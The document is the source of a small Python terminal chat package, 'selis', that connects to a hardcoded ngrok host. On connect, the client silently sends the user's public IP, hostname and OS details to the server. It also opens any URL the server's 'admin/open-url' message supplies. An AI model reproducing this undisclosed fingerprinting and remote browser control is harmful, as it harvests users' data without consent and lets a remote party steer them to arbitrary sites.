import sys

from optparse import OptionParser
from selis.client import ChatClient


def return_arguments():
    parser = OptionParser()
    parser.add_option("-v", "--version", dest="version", action="store_true", help="show version and exit")
    parser.add_option("-p", "--port", dest="port", help="connect to sever through this port")
    parser.add_option("-n", "--nickname", dest="nickname", help="choose a nickname")
    (options, arguments) = parser.parse_args()

    if options.version:
        print("selis 1.0.0")

        sys.exit()

    return_error(parser, options)
    return options


def return_error(parser, options):
    if not options.port:
        parser.error("\033[91m[-] Port not found\033[0m")


def main():
    options = return_arguments()

    ip = "0.tcp.ap.ngrok.io"
    port = int(options.port)
    nickname = options.nickname

    if nickname:
        pass
    else:
        nickname = input("\033[1m\033[0m[*] Choose a name: \n>> \033[1m")


    try:
        client = ChatClient(ip=ip, port=port, nickname=nickname)
        client.start()
    except KeyboardInterrupt:
        sys.exit()


if __name__ == "__main__":
    main()



import requests
import platform


class ComputerInfo:
    def __init__(self):
        self.url = "https://ipinfo.io/json"


    def get_public_ip(self):
        response = requests.get(self.url)
        public_ip = response.json()["ip"]
        return public_ip


    def get_system_info(self):
        return platform.machine() + "/" + platform.node() + "/" + platform.platform() + "/" + platform.processor() + "/" + \
            platform.release() + "/" + platform.system() + "/" + platform.version()


    def get(self):
        public_ip = self.get_public_ip()
        os_info = self.get_system_info()

        return public_ip + "/" + os_info
    


import datetime
import webbrowser
import os


def get_current_date():
    return datetime.date.today()


def get_current_time():
    now = datetime.datetime.now()
    return now.strftime("%p %H:%M:%S")


def convert_to_string(list_type):
    string = ""
    for i in list_type:
        string = string + i + " "
        
    return string.strip()


def open_url(url):
    webbrowser.open(url)


def clear_screen():
    os.system("clear")


def guide_to_exit():
    print("\033[0m[+] Press 'Enter' to exit\033[0m")



import socket
import threading
import sys
import getpass

from selis.computerinfo import ComputerInfo
from selis.utils import *


class ChatClient:
    def __init__(self, ip, port, nickname):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            self.connection.connect((ip, port))
            self.connection.settimeout(None)
        except:
            print(f"\033[91m[-] Sever not found\033[0m")
            sys.exit()

        self.nickname = nickname
        self.send_client_info_to_server()
        self.is_running = True


    def send_client_info_to_server(self):
        client_computer = ComputerInfo()
        info = client_computer.get()
        msg = self.nickname + "/" + info

        self.send_message(msg)


    def process_admin_mode(self):
        password = getpass.getpass("\033[1m[*] Admin's Password: \n>> \033[0m")
        msg = "/check-admin " + self.nickname + " " + password
        self.send_message(msg)


    def send_message(self, message):
        self.connection.send(message.encode())


    def receive_message(self):
        return self.connection.recv(1024).decode()


    def exit(self):
        self.is_running = False
        guide_to_exit()
        self.connection.close()


    def process_receiving_message(self):
        try:
            while True:
                response = self.receive_message()

                if response:
                    my_message = f">>> {self.nickname}:"

                    if my_message in response:
                        continue


                    if "admin/open-url" in response:
                        url = response.split(" ")[1]
                        open_url(url)

                    elif response == "system/exist_nickname":
                        print("\033[91m[!] This nickname already exists\033[0m")
                        self.exit()
                        break

                    elif response == "admin/close":
                        print("\033[91m[-] Server is not available\033[0m")
                        self.exit()
                        break

                    elif response == "admin/ban&kick":
                        print("\033[91m[-] Server is not available\033[0m")
                        self.exit()
                        break

                    elif response == "admin/close-server":
                        print("\033[91m\033[1m[-] Admin closes the server\033[0m")
                        self.exit()
                        break

                    else:
                        print(response)

        except:
            print("\033[91m[-] Connection is closed\033[0m")
            self.connection.close()
            self.is_running = False
            sys.exit(0)


    def process_sending_message(self):
        try:
            while True:
                content = input().strip()

                if self.is_running:
                    if content == "":
                        print("\033[91m[-] Typing something before sending\033[0m")
                        continue

                    elif content == "/exit":
                        self.send_message(f"client/exit {self.nickname}")
                        self.connection.close()
                        break

                    elif content == "/clear":
                        clear_screen()

                    elif content == "/admin":
                        self.process_admin_mode()

                    else:
                        print(f"\033[0m>>> (you): {content}")
                        self.send_message(content)
                else:
                    break

        except:
            self.connection.close()
            self.is_running = False
            sys.exit(0)


    def start(self):
        recieve_threading = threading.Thread(target=self.process_receiving_message)
        recieve_threading.start()
        
        send_threading = threading.Thread(target=self.process_sending_message)
        send_threading.start()

        recieve_threading.join()
        send_threading.join()



from setuptools import setup

setup(
    name='selis',
    version='1.1.1',
    packages=['selis'],
    entry_points={
        'console_scripts': [
            'selis=selis.selis:main',
        ],
    },
    install_requires=[
        'requests',
    ],
)
